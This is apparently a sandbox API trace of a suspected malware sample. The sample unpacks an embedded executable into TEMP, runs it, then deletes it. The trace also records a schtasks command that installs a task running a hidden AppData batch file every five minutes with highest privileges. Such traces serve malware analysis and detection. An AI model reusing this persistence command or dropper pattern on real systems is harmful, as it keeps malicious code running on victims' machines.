RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1a) returned 0x535a98 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x4a) returned 0x537048 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x72) returned 0x52f968 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x30) returned 0x5370a0 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x5370d8 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1c) returned 0x535ac0 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xd2) returned 0x537110 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x7c) returned 0x5371f0 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x36) returned 0x537278 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3a) returned 0x538438 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x90) returned 0x5372b8 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x24) returned 0x537350 [0172.697] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x30) returned 0x537380 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x36) returned 0x5373b8 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x48) returned 0x5373f8 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x52) returned 0x537448 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c) returned 0x538480 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x18) returned 0x5374a8 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x82) returned 0x5374c8 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x537558 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1e) returned 0x535ae8 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2c) returned 0x537590 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x54) returned 0x5375c8 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x52) returned 0x537628 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2a) returned 0x537688 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c) returned 0x5384c8 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x54) returned 0x5376c0 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x24) returned 0x537720 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x30) returned 0x537750 [0172.698] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x8c) returned 0x537788 [0172.699] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x537848 | out: hHeap=0x520000) returned 1 [0173.340] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x800) returned 0x537820 [0173.340] GetLastError () returned 0x0 [0173.340] SetLastError (dwErrCode=0x0) [0173.340] GetLastError () returned 0x0 [0173.340] SetLastError (dwErrCode=0x0) [0173.340] GetLastError () returned 0x0 [0173.340] SetLastError (dwErrCode=0x0) [0173.340] GetACP () returned 0x4e4 [0173.340] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x220) returned 0x538028 [0173.340] GetLastError () returned 0x0 [0173.341] SetLastError (dwErrCode=0x0) [0173.341] IsValidCodePage (CodePage=0x4e4) returned 1 [0173.341] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0173.341] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0173.344] GetLastError () returned 0x0 [0173.344] SetLastError (dwErrCode=0x0) [0173.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0173.347] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0173.347] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0173.347] GetLastError () returned 0x0 [0173.347] SetLastError (dwErrCode=0x0) [0173.347] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0173.347] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0173.348] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0173.348] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0173.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿVT\x16ñäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0173.348] GetLastError () returned 0x0 [0173.348] SetLastError (dwErrCode=0x0) [0173.348] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0173.348] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0173.348] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0173.348] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0173.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿVT\x16ñäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0173.348] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x80) returned 0x538250 [0173.800] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0173.800] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0173.800] RtlSizeHeap (HeapHandle=0x520000, Flags=0x0, MemoryPointer=0x538250) returned 0x80 [0173.800] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0173.801] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0173.801] GetCurrentProcess () returned 0xffffffff [0173.801] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0173.801] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0173.801] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0173.803] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0173.803] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0173.803] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0173.804] LockResource (hResData=0x43c648) returned 0x43c648 [0173.804] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x5382d8 [0173.804] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0174.708] GetFileType (hFile=0x90) returned 0x1 [0174.710] WriteFile (in: hFile=0x90, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x18df04, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x18df04*=0x37000, lpOverlapped=0x0) returned 1 [0174.717] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1000) returned 0x539820 [0174.719] WriteFile (in: hFile=0x90, lpBuffer=0x539820*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x18df00, lpOverlapped=0x0 | out: lpBuffer=0x539820*, lpNumberOfBytesWritten=0x18df00*=0x490, lpOverlapped=0x0) returned 1 [0174.719] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539820 | out: hHeap=0x520000) returned 1 [0174.720] CloseHandle (hObject=0x90) returned 1 [0174.720] GetCommandLineW () returned="tdq963ii.exe -accepteula -c 130 -y -p 2880 -nobanner" [0174.720] CreateProcessW (in: lpApplicationName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", lpCommandLine="tdq963ii.exe -accepteula -c 130 -y -p 2880 -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18facc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fb10 | out: lpCommandLine="tdq963ii.exe -accepteula -c 130 -y -p 2880 -nobanner", lpProcessInformation=0x18fb10*(hProcess=0x94, hThread=0x90, dwProcessId=0x91c, dwThreadId=0x5cc)) returned 1 [0176.032] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0189.365] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe")) returned 1 [0189.367] CloseHandle (hObject=0x94) returned 1 [0189.367] CloseHandle (hObject=0x90) returned 1 [0189.368] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x537820 | out: hHeap=0x520000) returned 1 [0189.369] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0189.369] ExitProcess (uExitCode=0x0) [0189.370] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5360c8 | out: hHeap=0x520000) returned 1 Process: id = "162" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x31676000" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "153" os_parent_pid = "0x6dc" cmd_line = "schtasks /Create /tn DSHCA /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\" /sc minute /mo 5 /RL HIGHEST /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 678 os_tid = 0xae4 [0171.690] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2dff74 | out: lpSystemTimeAsFileTime=0x2dff74*(dwLowDateTime=0x1fed75a0, dwHighDateTime=0x1d68287)) [0171.690] GetCurrentProcessId () returned 0xafc [0171.690] GetCurrentThreadId () returned 0xae4 [0171.690] GetTickCount () returned 0x1157b0a [0171.690] RtlQueryPerformanceCounter () returned 0x1 [0171.692] GetModuleHandleA (lpModuleName=0x0) returned 0x7c0000 [0171.692] __set_app_type (_Type=0x1) [0171.692] __p__fmode () returned 0x770331f4 [0171.692] __p__commode () returned 0x770331fc [0171.693] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7d7881) returned 0x0 [0171.693] __wgetmainargs (in: _Argc=0x7e9e6c, _Argv=0x7e9e74, _Env=0x7e9e70, _DoWildCard=0, _StartInfo=0x7e9e80 | out: _Argc=0x7e9e6c, _Argv=0x7e9e74, _Env=0x7e9e70) returned 0 [0171.694] _onexit (_Func=0x7e0fe2) returned 0x7e0fe2 [0171.694] _onexit (_Func=0x7e0ff3) returned 0x7e0ff3 [0171.695] _onexit (_Func=0x7e1002) returned 0x7e1002 [0171.695] _onexit (_Func=0x7e101e) returned 0x7e101e [0171.695] _onexit (_Func=0x7e103a) returned 0x7e103a [0171.695] _onexit (_Func=0x7e1056) returned 0x7e1056 [0171.696] _onexit (_Func=0x7e1072) returned 0x7e1072 [0171.696] _onexit (_Func=0x7e108e) returned 0x7e108e [0171.696] _onexit (_Func=0x7e10aa) returned 0x7e10aa [0171.697] _onexit (_Func=0x7e10c6) returned 0x7e10c6 [0171.697] _onexit (_Func=0x7e10e2) returned 0x7e10e2 [0171.697] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0171.697] WinSqmIsOptedIn () returned 0x0 [0171.698] GetProcessHeap () returned 0x9c0000 [0171.698] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4cc0 [0171.698] SetLastError (dwErrCode=0x0) [0171.698] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0171.698] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b 